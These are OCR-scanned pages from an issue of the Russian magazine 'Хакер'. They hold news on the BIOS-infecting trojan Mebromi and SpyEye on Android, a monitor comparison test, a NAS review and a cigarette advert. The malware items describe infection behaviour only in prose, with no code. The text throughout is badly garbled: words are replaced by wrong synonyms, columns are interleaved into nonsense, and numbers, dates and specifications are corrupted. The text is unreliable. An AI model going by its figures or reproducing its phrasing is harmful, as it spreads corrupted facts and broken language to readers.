аппаратновозможностейматеринскойплаты,обработкааппаратных

перты вирусной лаборатории обнаружили вредонос, получив­

ошибок, ведение режимами питания, сервисные функции ит.д.

шей назва н ие Tгojan.Mebгomi за классификации Symantec. На

Д ля модификации самого образа ВIОSданная вредонос н ая програм­

основной взгляд, сие трафаретный пофункционалутроян, заражающий

ма используетутилитусЬгоm . ехе !от PhoenixTechnologies], которую, на правах

такжезаложены механизмы, позволяющие заразить

MBR равно пытающийся скачатьчто-то изо сети, но, в духе выяснилось, во него BIOS материнской

троянецвнедряетв отображение особенный часть hook.гom во качестве

платы компьютера.

Затем Tгojan.Mebгomi отдает своему драйверу команду перепрошить

Первоначально дроппертроянца Т гojan.Bioskit . 0 проверяет, запуще­

равно целое другие файлы, слабит у себя на ресурсах. При помощи этой утилиты

ISA BIOS ROM.

BIOS изо обновленного файла. При следующей перезагрузке компьютера во процессе инициализа­

ны ли ОС процессы нескольких китайских антивирусов: еслитаковые обнаруживаются, тотрой создает прозрачноедиалоговое окно, с кото­

ции

рого осуществляется предписание его главной функции . Затем Tгojan.Mebгomi

hook.гom. Вредоносный шифр изо сего модуля всякий единовременно проверяетзара­

определяетверсию ОС равно во случае, неравно зто Windows 0000 равным образом раньше !за

женность

исключением WindowsVista], продолжает заражение. Троя н проверяет

тить, который реальность на системеАwагd

средства командной строки, изо которой спирт можетбытьзапущен вместе с раз­

даннымтроянцем. Так, с трех проверенных на вирусной лаборатории

личными ключами. В ресурсахдроп п драчун у п аковано малость файлов:

материнских платзаразитьудалось всего одну, а во д вухдругих на памяти

сЬгоm.ехе, hook.гom,

my.sys, flash.dll равным образом Ьios.sys. Е слидрайвер Ьios.sys не удается запустить, тож BIOS колтун п ьютера отличается отАwагd, троянец переходит ко заражению MBR. Но еслидрайверу Ьiоs . sуsудается опознать Awaгd BIOS, в таком случае начинается самое интересное. Автор Tгojan.Mebгomi вдоволь

BIOS будетвызывать до сей времени имеющиеся PCI Expansion ROM, во книжка числе и MBR да перезаражает ее на случае необходимости. Следует отме­ BIOS совсем далеко не гарантируетзаражение

BIOS шаблонно никак не хватило места чтобы календарь внове го мо дуля от маслом . П олучается, что неравно последетектирования равным образом лечения Tгojan.Mebгomi концепция вновь оказывается инфицированной, в таком случае источником заражения, верней всего,

выступает инфицированный

BIOS компьютера.

УГРОЗЫДЛЯ МОБИЛЬНЫХУСТРОЙСТВ ВСЕ МНОЖАТСЯ

09°/о ПРИЛОЖЕН ИЙ

НА БАЗЕ iOS И ANDROID НЕ ОБЕСПЕЧИВАЮТ

НЕОБХОДИМЫЙ УРОВЕНЬ

БЕЗОПАСНОСТИ, СЧИТАЮТ ЭКСПЕРТЫ

VIAFORENSICS ХАКЕР

01 /154/ 0011

013


MEGANEWS

INTELИ GOOGLE &УДУТТЕСНО СОТРУДНИЧАТЬ во целях оnтимизации nлатформы Androidдля микропроцессоров lntel.

SPYEYE ДОБРАЛСЯ ДО ANDROID

ИРАНЗАБЛОКИРОВАЛТОR

БАНКОВСКИЙ ТРОЯ Н ЧУВСТВУЕТ СЕБЯ ВОЛЬГОТНО И НА МОБИЛЬНЫХ

TOR В ТОТ ЖЕ ДЕНЬ ВЫПУСТИЛ ОБНОВЛЕНИЕ,

ПЛАТФОРМАХ

ЧТОБЫ ОБОЙТИЭТУБЛОКИРОВКУ

\l!.:Ь- Spy Еуе .... ""--,... .. rJoe---' -""' Pathtatlм f~t.Ь.rcoМrol,_.., [~

....,

• _ __ _ _ _ ..._ - ... ..... 1...... --..n,,,, __ ____ _______, ..,.,..,_uAo•_........ ...... __ ,..,,,_ _ .__,... ~., ,,,

-f_.,.J~_

0.-t..,.,.,.,~_

:.. ... ~аи ... -~· Ь.Ьt

-с.J.

::::;:~~1 ('!~0•.1.

~

·-~·

....... , ,,,_ __--""'_•-aol ..,.,.,_uo/N_._,_........-· 1 . . . . . , , , ,_ _ _ _ _ _ . . . , . .,.,..,-w.............. ~•• •lt- . ,...-aмto.-t..,._p/~1a/-O.~· .' ....... , ,_ __ _ •. ...

....... ,,,,_________ •"*'••• •11- .ou..noooto.-· sа.

щ

,..,. ,_ ~....;-.а..-1•

........... .,_.J....._._,..,. . •--.1._,..,,.__

•no, :/J _... . ,...-a~.ao.-to,,.,.. f-....JНJ~-•HI•at._......... _".,,.,..,~..~~-·

, ._"_,..._._... __• r · - -·••U.C•1 : .. ,,,_ __ _•--t••,.,.,,.__ r._.- • К. • oCI•1

~

r . _ , . -. , oauO•.l '

"loaчo :ll ----

....

•1-н

...-

• .....•

есной текущего лета специалисты F-Secureyжe били

Поданным компании

четвергутром Персия добавил новое положение

тревогу, обнаружив атаку Man-in-the-MoЬile из уча­

Trusteer, малварь на базе Zeus равным образом SруЕуе­

филырации во личный лимитрофный файрвол чтобы того ,

стием модификации SpyEye. Тогда выяснилось , что малварь, созданная получи основе известного банковскоготрояна,

держи у чилась приостанавливать SМS-сообщения из устройств,

дай тебе заблокировать движение недотка Тог. Благодаря

особливо часто используемые бан­ ковскиетрояны. На нихприходится

02%

помощи многочисленны х друзей со общей сложности света, создатели

бредень быст ро определили дорога блокировки равно выпу вместе с тили

работающих nодуправлением SymЬian. Д аль ш е-боль ш е. В

через 0.6 миллиона слу­

новую версию Тог, со через кото р ой его не запрещается обойти. К

этом месяце исследовате ли компании Тгustеегобнаружили

чаев обнаружения равно

счастью, пр облема была на ретранс ляторе: сие означает, что-нибудь

удаления вредонос­ ного программнаго

полно дать новую жизнь ретрансля торы равно бриджи, равным образом многие де­

ния, только поуже в Android-anпapaтax. Заражение реализовано

обеспечения, кра­

сяткитысячпользователейвИранесно вап олучатвозмож-

пр равным образом митивным образом, почтитакже в качестве кого на cлyчaecSymЬian:

дущего финансовую

н что касается от ть коптеть со Тог, невыгодный буду чи вынужденными до конца

троянецSрitmо, что перехватываеттекстовые сообще­

людям , чьи ко мпьютеры еще были инфицированы

SpyEye,

информацию .

обменивать программное обе со печение. << Как те х нически работал этот фильтр? Тог пытается совершить в такой мере , с намерением еготрафик

предлагалось найти для интертелефон фейковое ПО для работы не без; банковскими онлайн-сервисами . После сего SМS­

выглядел легко попыткой веб-браузера соединиться не без;

со ообщения жертв , попавшихся держи удочку хакеров, начинали

c e pвepoм, хотя подле сильнее внимательном рассмотрении дозволяется

https-

пере х ватываться равно уходить получи из айт, находящийся подо

было у видать некоторые люди заслуги . В нашем случае сие были

контролем злоумышленников. Эксперты Trusteeг пишут,

характеристики установленияза шифра ованно госоедин е ния

что-нибудь изучили командирский сервер, гд е хранятся похищенные

Тог ' а, во частности долгота срока д ействия сертифи­

данные, да обнаружили, что такое? вредоносным пр иложением

ката чтобы SSL-ceccии : я изменяли число образ действий сертифи­

на срок инфицировано н езна читель хотя е состав людей . Н в отношении

ката сессии каждые двум часа, на в таком случае момент наравне рядовой отрезок времени

авторы троя для безусловно занимаются его развитием, равным образом во будущем

поведение сертификатов- время тож более . Для устране­

кардинально могут разнести воз неудобета отнюдь не всего только бан­

нияблокировкидостаточнобылопростоувеличитьсрок

кам, которые равно вместе с пользуютодноразовые ТАN-коды , хотя равным образом таким

поведение сертификатов , круглым счетом чтотеперь наши сертификаты

от айтам , по образу Google равно

имеютболее вероятный время образ действий >>, -говорят

Facebook, которыетакже да от поль зу полуют

смартфоны интересах ра от сылки одноразовы х батман ролей .

создатели волокуша .

hтс:

BTOPHИK-ДEHbDDOS!

МО&ИЛЬНУЮ ОС ПЛАН И·

05%ПОСТОВСВИДЕО

ПИРАТСКОЕ ПО ВСТРЕ·

ДОЛЖНОСТЬДИРЕКТОРА

РУЕТ ПРИО&РЕСТИ НТС.

НА FACEBOOK- ЭТО

ЧАЕТСЯ В РОССИИ НА

ПОЗАЩИТЕ ПЕРСОНАЛЬ·

Почти

Вероятнее всего, избрание

LIKEJACKING. То принимать

02% КОМПЬЮТЕРОВ. Для

НЫХДАННЫХ nоявилась

атакэа неделю nрихо­

нажал получай видео-nоставил

сравнения:в США данный но

на

дится не кто иной нет слов вторник,

Like! неnонятно чему.

nокаэательравен36%,ав

займет Эр ан Ига н, досель

сообщает «Лаборатория

Нигерии 01%.

работавший на комnании

Kacnepcкoro».

комnании nадет на разрабатываемую иНР.

webOS, Palm

Facebook. Этот nост

03% всех ОDоS­

юристом.

011,

ХАКЕР

01 / 054/20 01


SKYPE ОliЭАВЕЛСЯ СВОИМ МАГАЗИНОМ ПРИЛОЖЕНИЙ . Пока на Арр Diгectoгy внятно грубо 00 программ .

ГИБКИЙ РИДЕР OTWEXLER

EDIFIER R1200Т­

КОНЦЕПТЫНАКОНЕЦСТАНОВЯТСЯ

ТЕПЕРЬ В ЧЕРНОМ ЦВЕТЕ

РЕАЛЬНОСТЬЮ конце октября пароходство Еdifiегперевыпускает хорошо знакомуюпользователямакустическую

систему Edifieг

R1200T на новом обличии. Д анная

образец пока что короче представлена на черном цвете. Напоминаем, в чем дело? Edi fieг

R1200T -малога баритная, ка­ [140 х 040 х 083 мм), которую

чественно исполненная построение

ввидускромных размеров безтруда дозволено водворить прямо на столе около монитора. Модель является недурной альтер­ нативой пластиковым компьютерным колонкам, особенно еслиприходитсяэкономитьпространство . КорпусR1200Тиз­ готовлен изо МДФ равным образом согласно крыт декоративной пленкой. Передняя па н дерево на свою цепь п окрыта синтетическим ма т ериалом,

кто имитирует кожу, а лицевая панелька защищена рам­

кой, сверху которую натянута акустическая тка нь. Р егулировка громкости равным образом уровня баса вынесена для заднюю панель. С техническими характеристиками у R1200T всетоже более чем неплохо. Все динамики системы магнитноэкранирован­

ные. Диаметр СЧ/НЧ-динамика-106 мм, твиттера-72 мм; диапазон воспроизводимых системой частот колеблется от 02 Гц по

m

00000 Гц.

Выходная мощностьсистемы -2х8 Вт

а различных выставках вотуже порядком полет

Начатьвыпуск

RMS, а

можнонаблюдатьпрезентациигибкойэлектрон­

устройств со гибким

скромные га бариты, Edifieг R1200T звучиточень достойно,

утнапиштим бума г и, которая легким движением щипанцы

давно. Была

братва чив ается во трубочку. Тем отнюдь не менее, ни одного девай са, который позволено было бы свертеть во трубочку, толкучий в эту пору

круглым счетом неграмотный увидел:). Этуситуацию исправляет бражка Wexleг со своей уникальной разработкой-электронной книгой

WEXLER .BOOK Flex ONE, выполненной возьми основе гибкого 0" экрана E-iпk вместе с пластиковой подложкой. Благодаря новой технологииможнонебеспокоитьсязабезопасностьэкрана.

Новинка обладает противоударными свойствами, ее не возбраняется

экраном обещают электронная атлас

Readius, которую анонсировали до этих пор

во

001 О году, ну да приблизительно

равно безвыгодный выnустили.

Кроме этого, дозволяется

потребляемая-25 Вт. Но главное- вопреки нате домашние

вчастности,даеточеньнеплохиенизкиечастоты . Словом,

тут хоть сколько-нибудь есть вариация

R1200T от дизайном <<под дерево>> во про­

шлом году п олучила награду<<Лучшая покупка>> с журнала <<Железо>> на тесте акустических систем

0.0.

Розничная курс

новинкисоставляет2200рублей.

переворошить да концепт сворачивающеrося

во трубочку ОLЕD­ дисплея через компании

Sony.

гнуть, унижать возьми п ол равно аж переносить на заднем поступок н е джин­

сов! Основное предпочтение гибк что до годиспл ея с ста ндартн ого экра­ нанаосновеэлектронныхчернилзаключаетсявтом,чтопри

его производстае заместо не без; т екля нной подложки используется полимерная. Н овыйдисплей включаеттончайшую стальную пластину со нанесенным получи нее слоем электронных схем, кото­

рую не без; во ерху прикрывает кассета с «электронных чернил>>. Не­ смотря получай до сей времени это, девайс выполнен на эргономичном корпусе.

Габариты-124х139х7,5 мм, масса-менее

000 г. WEX LER.BOOK Fl ex ОNЕоснащен встроенной памятью на 0 ГБ , которую дозволено распространить предварительно 00 ГБ после счетвнешних карточек формата MicгoSD. Ридер п по отношению ддер живаетсамые по­

пулярные форматы электронных книг [ Т Х Т 0PDF/ О ОС/ СНМ / НТМ / НТМL / EPUB / FB 0), изображений [JPG / JPEG / ВМР /G IF 0PNG) равно аудио файлов [МРЗ). При интенсивном ч тении полногозарядааккумуляторахватаетнанескольконедель.

П оставки читалки н ачнутся ранее на этом месяце. Рекомендо­

комната розничная стоимость -

0.990 руб.

WINSTON XSTYLE ОТ WINSTON Wiпston представляет долгожданную нoвинкyWinston XStyle: сигареты паче компактного формата, отличающиеся

XS равно способствует нейтрализации запаха табачного дыма для окружающих. Winston XStyle LSS: новое фиксирование

дополнительно утонченным вкусом. Инновационная методика

мягкости вкуса .

LSS' мелодично дополняет либерализм вкуса очертания Wiпston

'LSS- в меньшей мере запаха табачного дыма.

~ МИНЗДРАВСОЦРАЗВИТИЯ РОССИИ ПРЕДУПРЕЖДАЕТ: КУРЕНИЕ ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ

W/


FERRUM

Сергий Плотни заговор

...

С ПРИСТАВКОИ

SUPER Заявляем: монитор необходимо фильтровать

СРАВНИТЕЛЬНОЕ ТЕСТИРОВАНИЕ МОНИТОРОВ

НА БАЗЕ IPS/MVA-MATPИЦ

е веришь? Давай посчитаем . Если

RGB- 04 бит. Именно поэтом у IРS-матрица вы­

учесть, что такое? индивидуальность начинает <<об­

дает приземленно образцовый черноволосый цвет. Также

щаться » от РС в круглых цифрах на

данная методика позволяет доставать высокие

00-12 лет, так во

оченьтщательно!Как

день-деньской спирт проводит предварительно дисплеем 0-5 часов.

углы обзора, высокую контрастность, цветовой

тачка alias новую

Повзрослев, требуется п росиживать кюлот

охват равно цветопередачу ... Но вслед за до сей времени сие требуется

до этих пор ноталгия ш е - во районе 0-1 О часов на день планирование

уплачивать адски глоссалгия ш им временем отклика.

подружку. Хотя бы потому, что накануне экраном сей

чудного устройства техноманьяк во среднем

проводитчетверть своей

жизни!

таким образом 00 сподряд !учеба, работа, отдых!. Уже бу­

Со временем, ко слову, габариты TN равным образом IPS размы­

дучи получи и распишись пенсии, техноманьяк со стажем уделяет

лись. Здесь равным образом в тот же миг существуют что мониторы получи и распишись

компьютеру 0-2 часа во день. В итоге получаем,

базе TFT TN от большими у глами , беспричинно равным образом мониторы

зачем безличный юзер следовать

в базе IPS из быстрым откликом. Стандартов же­

свою бытие проводит вслед монитором ориентировочно

море. Но лишше лишь популярны получи и распишись текущий

040000 часов, 0834 дней либо — либо но 06 лет. Согласно

сутки H-IPS IHoгizoпtali , E-IPS IEпhaпcedl равно P-IPS

информации Росстата, средняя продолжитель­

IPгofessioпall. Первый обеспечивает пока что большую

ность жизни граждан нашей страны составляет

контрастность, а тоже поддерживаеттехнологию

08.84 возраст . В итоге да секс учается, зачем продвину­

Advaпced Тгuе

тый русский проводит вслед экраном монитора

ный кипень цвет. Второй имеет большую апертуру

03.24% своей жизни ...

дляувеличениясветопроницаемости.Наконе~

Так зачем п овторим сейчас больше уверенно: мони­ тор что поделаешь сортировать тщательно. Особенно

White, дающую больше реалистич­

P-IPS обеспечивает 0.07 миллиарда цветов при 30-битной глубине цвета.

сие касается людей из творческой натурой равно

• Apple LED Cinema Display • ASUS PA246Q • Dell UltraSharp U2711

профессией. Дизайнерам , а да инженерам,

ЗОЛОТАЯ СЕРЕДИНА

неослабно работающим из графическими редак­

Технология MVA IMulti-domaiп Veгtical

торами равно САО-программами, прямо необхо­

Aligпmeпtl, разработанная компанией Fujitsu,

квартал монитор не без; большенный диагональю, полной

является компромиссом посередь TN да IPS. Она

глубиной цвета, идеальной цветопередачей да

позволяет павел вразумлять матрицу со большими

большим домиком обзора . Естественно, мониторы

вертикальными да горизонтальными углами

получи и распишись базе ТN-матриц далеко не могут вручить себя всех

обзора, глубиной цвета и, по причине те х нологии

потребностей человечества. По зтому идеаль­

ускорения RCT, малым временем отклика. Но на

ным выбором гика - работяги станут устройства

сравнении не без; IPS замет нате обусловленность цветовог насчёт

получи и распишись базе технологий IPS ISFTI либо но MVA.

баланса с угла зрения, а да исчезнове н ие деталей во тенях присутствие п ер п ендикулярном взгляде.

• iiyama Prolite X2472HD-1

МЕДЛЕННЕЕ, ДОРОЖЕ , НО КРАСИВЕЕ

• LG IPS236V

Теперь по мнению порядку. Технология IPS llп-Piaпe

няшнем тестировании всегда мониторы, опричь

Чуть забегая во п еред, скажем, что такое? на сегод­

Switchiпgl тож а SFТ ISupeг Fiпe TFТI была

одного, основаны держи базе в таком случае й не в таком случае — не то другой разно­

• NEC MultiSync EA232WMi

разработана компаниями Hitachi да NEC !от­

видности IРS-матрицы. Поэтому единственная

• ViewSonic VP2365wb

дельно!. Несмотря бери отличаются как небо и земля названия, путь

МVА-модель- iiyama Pгolite X2472HD-1 -

работы ЖК-матрицы был неизменен!. Второй но

заранее участвует

без конкурса.

фильтр завсегда был расположен перпендикулярно

016

первому, а следовательно, освещение сквозь него никак не

МЕТОДИКАТЕСТИРОВАНИЯ

проходил . Кроме того, всего лишь буква методика

Со всевозможными технологиями ознакоми­

способна давать полную глубину цвета

лись- период перепрыгивать из рук в руки ко

ХАКЕР

01 /154/2011


С приставкой Supeг

тестированию! Пока кинематография монитора прогре­

Pixel

валея во перемещение получаса, я изучали дизайн,

пытуемых возьми небо и земля профили обновления

должны состоять натянуты ровной, упругой струн­

функционал равным образом эргономику девайса . Также уде­

картинки . Правда, ко мониторам возьми базе IРS­

какой . Любое отступление говорит по части нарушении

лили подчеркнуть что организации разблюдовка да наличию

матриц чинно смотреть далеко не стоит: как ни говорите

цветопередачи . Второй параметр характе­

la

Peгsistence Analyzeг ты да я nроверили ис­

из тремя RGВ-линиями. В идеале постоянно контур

становая жила качеству) предустановленных настроек

методика подразумевает наличествование большого

ризуется площадью красного треугольника.

дисплеев . Для мониторов держи базе IРS-матриц

времени отклика.

Чем значительнее форум этой геометрической

важным дополнением, безусловно, является

фигуры- тем значительнее цветовой охват. Для

Наконец перед занавес тестирования,

существование подставки не без; несколькими степенями

вооружившись профессиональным колори­

сравнения приведен оливково-зеленый треугольник,

свободы, а и опции крепления

метром DataColoг SруdегЗ

а вот поэтому и есть норма

VESA.

Монитор прогрелся. Первым делом быть по­ мощи программы

TFTtest

автор сих строк изучили равномер­

Elite,

определялась

sRGB.

Мониторы получи базе

цветопередача [под нулевым углом, почти домиком

IРS-матриц будет должны держать боль­

градусов на горизонтальной плоскости да

шую участок цветового охвата . Мониторы держи

05

00

ность подеветки соединенными усилиями не без; отклонением яркости

градусов- на вертикальной) равным образом цветовой охват.

базе Р-IРS-матрицы должны оспаривать пока что равно

по части краям экрана . Далее nри помощи утилиты

Первый параметр характеризуется графиком

стандарту

Adobe RGB.

APPLE LED CINEMA DISPLAY. нешний облик дисплея

Apple

позволено указать классическим.

Яблочной компании всего равно остается, аюшки? заnатентовать со­ четание черного цвета передней панели из бело-серебристой

з адней крышкой корпуса монитора. Чтобы никому безвыгодный вздумалось с имитировать идею! Если осматривать из эстетической точки зрения , ведь

равных

Apple LED Cinema Display

немудрено нет. Собственно говоря, з а сие

равным образом любят продукцию Стива Джобса. Если но отведать отвлечься ото философии

Apple,

ведь мож­

же откопать фаланга недостатков дисплея. Во-первых, сидеть из яркой глян­

цевой поверхностью, несомненно единаче лещадь аккомпанементтеплых августовских лучей солнца, далеко не капли удобно. Так да так и подмывает е х идно прикрепить << желез­ к у» : освещение мой, зеркальце, скажи ... Во-вторы х , присутствие единственного

порта вании

Mini DisplayPoгt накладывает особые ограничения быть использо­ Apple LED Cinema Display от РС- придется высматривать графичный

плата не без; соответствующим интерфейсом. Наконец, реальность лишь трех USВ-розеток ставит героя сии х строк для одну с последних ступенек в табели в рассуждении рангах подина названием << функционал>>.

есмотря держи ведь что-то диагональ монитора ASUS PA246Q всего 24 дюйма [есть на сегодняшнем тестировании равно экземпляры

не без; 07-дюймовыми экранами), с от кронштейном крепле­ ния устройство выглядит жуть мощно. Если монитор потребуется разместить получи и распишись столе, ведь готовься расчистить по-под него дополнительное

зона . Тем малограмотный менее, катафалк выполнена идеально! В меру

жесткая, симпатия малограмотный позволит ему сместиться ни получай йоту. А быть необходи­ мости твоя милость можешь обратить защита во любую сторону. Подставка обла­ даетсразучетырьмястепенямисвободы.Поэтомуподстраиватьсяпод монитор невыгодный придется: скорее, дисплей довольно подлаживаться около тебя.

Что касается функционала, так

ASUS PA246Q

оснащен всеми

современными видеопортами [за исключением, пожалуй, DisplayPoгt), а вот и все тремя портами ридером нате

0 типов

Mini USB равно универсальным кард­

флешек. Расположено целое <<хозяйство» получи боко­

рыдания панели корпуса, в чем дело? жуть удобно. Матрица

ASUS PA246Q

соответствует стандарту

P-IPS. Следо­ 1.07 млрд

вательно, что ты да я уж выяснили раньше, обеспечивает цветов присутствие 00-битной глубине цвета.

ХАКЕР

01 / 054/ 0011

017


FERRUM

DELL ULTRASHARP U2711 не ш невыгодный дисплей

Oel l UltгaShaгp U2711

выгля д ит до чертиков бла­

горо д да . Он в отношении г ромен да прекрасе н . Здесь пропал т ой смазливо­ сти, которая п рисутствует, наприме р , у д ис п лея

Apple.

Но сие

далеко не неграмотный отталкивает. А неблестящий кор п усище равно киноискусство позво л яют полно­ стью ско нц ентрироваться н а ра боте. Такой дисплей несложно обязан н аходи т ься получи столе у начальника какого-нибудь конструкто р ско г о бюро тож но руково д ите л автор какой-нибуд ь т естовой лабора тории. За ностро мощной п относительно д со т авки

Oe ll Ul tг aS h aг p U2711

обладае тт ремя

степенями свободы, зачем п озволяет п в отношении д творить большенный 07 -д юймо-

вый защита подина домашние нужды. К сожалению, перетряхнуть планзифтер нате 00

~

градусов невыгодный получится- тумбочка неграмотный позволяет.

Богат равным образом функционал дисплея. На левой сторо н е корпуса экрана рас­

положена паро ч ка USВ- п ортов да универсаль н ый кард-ридер н а

0

запоми н ающих устройс т на . Е сли дисплей буд е т отираться получи сто л е, то дотя н у т ься до самого них н е состави т занятие а. Более скрыт н насчёт себя ве д ут видеоинтерфейсы равно

OVI, 0 -S ub, HO MI,

OisplayPoгt равно покамест двуха U S'IЗ. П в рассуждении

су т и, п еред н ами, наверное, самовольно ы й уни во е р просаленный дисплей не без; полным

<<фар ш ем».

IIYAMA PROLITE X2,72HD-1 ере д нами, на правах сказал бы факел русского кинематог р афа, «свой средь чужих, чужбинный середи своих>>. Мони т вопль

iiyama

Pгo l ite Х2472 НО -1 является представителем равным образом гордым об­

ла д ателем VА-мат р да ц ы. А точнее,

MVA.

Имен н касательно благодаря тому автор решили

безвыгодный инвентаризировать зто строй посредь дру г их, бо ото лукавого. Но на­ верняка посетитель заинтересуется д а нн ой моделью. Экран усишко т анов л ен на пластиковую оправу. Согласно позже д ним

веяниям моды, автор имеем обязанности со гл янцем. Смотрится пышно д о пе р вых касаний пальчиками . Запасись тряпочкой! Устанав л ивае тся станина держи для р охотную подставочку. Из-за того что общий на есть д исплея безвыгодный п ревышает ч етырех килограмм, держится кон­ струк ци пишущий эти строки д оволь н что до н адежно. Н об за небольша г а количества сте п е­

ней свобо д ы ! дисплей позволяется поворачивать как только вок р уг г оризонтальной оси ! возможностей по мнению месячные ировке положения удивительно р ана немно г о. Н аконец, расс т раивает фу-ты н кцио н а л ь н ая составляющая мо н да т ора .

П р авда, ве нд оробещает на ближайшее вр емя выпусти т ь улучшенную мо д дерево ВХ2472 НО вместе с ул уч ш е нн ой п одс т а на кой. Помимо видеоин­ т е р фейсов

0-Sub, OVI равным образом HOMI ,

сверху ко рп усе

iiyama

Pгol i te Х2472 НО -1

мука ш е н иче г касательно неграмотный т.

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ Тиn матрицы : Диагональ, позволение :

Углы обзора соответственно горизонтали/вертикали : К оличество цветов : Контрастность : Время с для лика :

Габариты :

Apple LED Cinema Display

IPS 27"", 0560х1440 точек 178/178 градусов 16.7 млн 1000:1 12 мс

0/0:

090х650х201 мм Mini DisplayPoгt, 0х

Вес :

00.7 кг

018

USB 0.0

Dell UltгaShaгp U2711

ASUSPA246Q

IPS 24.1"", 0920х1200точек 178/178 градусов 1073.7 млн 1000:1

IPS 27", 0560х1440 точек 178/178 градусов 1073.7 млн 1000:1

0мс 559х381х235 мм 1х D-Sub, 0х DVI, 0х 2.0, кард-ридер 7.3 кг

0 мс 647х428х200 мм

HDMI,

0х DisplayPoгt, 0х

USB

0х D-Sub, 0х DVI, 2.0, кард - ридер 7.7 кг

HDMI,

0х DisplayPoгt, 0х

ХАКЕР

USB

01/154/2011


С приставкой Supeг

NEC MULTISYNC EA232WMI нешне дисплей

выглядит ахти

NEC MultiSync EA232WMi

строго. Здесь малограмотный найдешь особых закругленных форм корnу­ са да неграмотный nрищуришься с блика маркого, глянцевого корnуса.

Но зто никак не означает, аюшки? дьявол плохо выглядит. Просто данная модель превосходно подойдет ради строгого интерьера- того а рабочего кабинета. Очень удобная катафалк п озволи т накручивать монитор как душе желательно . Неоспоримый преимущество чтобы дизайнера или — или инженера. А сбоку равным образом сзади, исключая видеовыходов, кушать моментально

0 портов USB.

Настройками список достанет свободно обслуживать около помощи

своеобраз ного джойстика. Воспользоваться опциями

NEC MultiSyпc EA232WMi пришлось по поводу того, который приближенно называемый ЕСО Mode за ста-

~

аз многогрешный н однако изменял тесситура яркости эка рана. Работать из таковский цветомузыкой было невозможно. Позтом у целесообразно пускать в ход технологию во мо-

менты, в некоторых случаях неграмотный поль зуешьс ваш покорнейший слуга монитором. С непохожий стороны, почему бы без затей безвыгодный отключить монитор тож никак не приказать оставить ПК во спящий режим? С третьей стороны, проблемы экологии, затрагиваемые

NEC,

достойны уваже ния.

VIEWSONIC VP2365WB авершает сегодняшнее испытание дисплей с компании

ViewSoпic. Примечательно, зачем я сейчас знакомились из сим

устройством годочек назад. К сожалению, панно осталась печальной: вслед настолько многолетний пора валюта получи IРS-матрицы изменилась малограмотный сильно.

Модель подина скромным возьми званием

NEC MultiSync EA2 02WMi . Но

VP2365wb

на лицо напоминает

никакого копирования после этого нет. Просто

в целях инженеров, художников, дизайнеров равным образом архитекторов подобная конструкция, для отечественный взгляд, является оптимальной. Вот равно дисплей от <<птичьеЙ>> компании обладает подставкой не без; четырьмя степенями

свободы . А оттого расположить/повернуть кино сверху рабочем столе не составит труда.

К сожалению, в целях нас является загадкой, зачем инженеры

ViewSonic безграмотный разместили имеющиеся штаны USB держи главный панели. Все 0 слота расположены сзади: в качестве кого следствие, ко ним отнюдь не очень удоб н относительно обращаться. Там а находятся видеоинтерфейсы: 0-Sub и DVI- набор, признаемся, спар танский. Для уде ржания всех прово­ до во на одном nучке сверху ножке подставки nредусмотрены специальные рамочки.

РАЗДАЕМ МЕДАЛЬКИ Лучшие nоказатели продемонстрировал

NEC MultiSync EA232WMi

ViewSonic VP2365wb

UltгaShaгp

U2711 . Даже

почти домиком

00

Dell

градусов nре­

тензий для картинке несть [на фоне остальных участ­

ников! . Вкуnе со богатым функцианалом дисnлея да

MVA 24", 0920х1080точек 178/178 градусов 16.7 млн 3000:1 8 мс

IPS 23", 0920х1080 точек 178/178 градусов 16.7 млн 1000:1 14 м от

070х420х179 мм

050х379х220 мм 1х mini 0-Sub, 0х 5х USB 0.0 7.5 кг

0-Sub,

0.6

OVI,

HOMI

кг

IPS 23", 0920х1080 точек 178/178 градусов 16.7 млн 1000:1

0 мс 548х434х250 мм

OVI,

0х OisplayPoгt,

0х 0-Sub, 6.8 кг

OVI,

огромной диагональю на нашей тестовой лаборато­ рии невыгодный вслед за кралось ни единого сомнения насчет

nобедителя на номинации <<Выбор редакции>>. Если у тебя глотать

00000

рублей, тебе необходим дисплей сверху

базе IРS-матрицы, ведь сколько стоит у твоя милость до сей времени малограмотный во магазине?

Пр с << Л уч шая покуnка>> получил монитор 4х

USB 0.0

PA246Q . Пожалуй,

ASUS

идеальное вотум на дизай­

нера равным образом инженера, которому неутомимо необходимо работать дома. :х:

ХАКЕР

01/154/2011

019


FERRUM

Алексий Шуваев

v

ЛИНЕИКА: BUFFALO Японская шатия-братия

Buffalo- безраздельно

изо крупнейших мировых

производителей сетевых накопителей хранения данных. Этой осенью братия пришла держи общероссийский рынок, равным образом нам стало интересно войти в ядро вопроса от новым для того России семейством

сетевых накопителей. Тем побольше который

Buffalo- общество

от традициями, а устройства, созданные на Японии , всегда елавились своим качеством .

LINKSTATION PRO од определенным ракурсом настоящий девай из своей формой на­ поминает игровую кронштейн ото

Buffalo Интерфейс диска:

Microsoft. Правда , устройс тво

осязаемо меньше, а тоже наделено поблизости талантов,

которые слож н в рассуждении переоценить. К примеру, девайсможет экономить

0 х SATA-11

Поддерживаемая емкость:

перед

0, 0, 0 Т б

0 терабайт информации, почто пусть даже согласно нынешним меркам ужас

Интерфейсы: Etheгnet

заслуга . Сетевой память не без; гигабитным интерфейсом обе­

00/100/1000 Mbps, 0 х USB 0.0

спечит контентом однако домашни е устройства, тем более не грех отнюдь не всего лишь

Поддерживаемые nротоколы:

SMB/CIFS, AFP, FTP, НТТР, НТТРS IWebAccess], NTP

наслаждаться расшаренными папками , однако равно прибиваться к помощи медиаплееров, поддерживающих

Потребляемая мощность:

NAS при DLNA равно UPnP. Однодиско­

вая образец прагматично нелёгкая ш умна да nотребляет наименьшее количество энергии,

07 Вт 0макс. 04 Вт 45 х 056 х 075 мм

а е ще может предназначаться держи раздаче торрентое равным образом нести протоколы и заботы на качестве

Габариты: Вес: 0.1 кг

принт-сервера, кабы отсоединить принт ер для свободному USВ-порту.

LINKSTATION DUO азгоняй тоску равным образом повышай прочность от двухди ско­

вым девайсом, какой-никакой nозволяет взвихрить скорость передачи данных сиречь увеличить верность хра нимой

информации следовать счисление зеркалирования дисков. Закинув во топку хранилища пару дисков, позволено извлечь раздел емкостью накануне

0 Т б - зто го после тараньки хва тит чтобы хране ния как бы личного медиа­ архива, приближенно равным образом с целью размещения личных файлов равно организации

рабочей инфраструктуры. Если твоя милость почитатель девайсов из над­ кусанным яблоком, так оценишь поддержку

Apple TimeMachine

-можно сберегать столько снэпшотов, как долго тебе потреб ует­

ся. При установке приложения

WebAccess для iPhone равно Аndгоid­

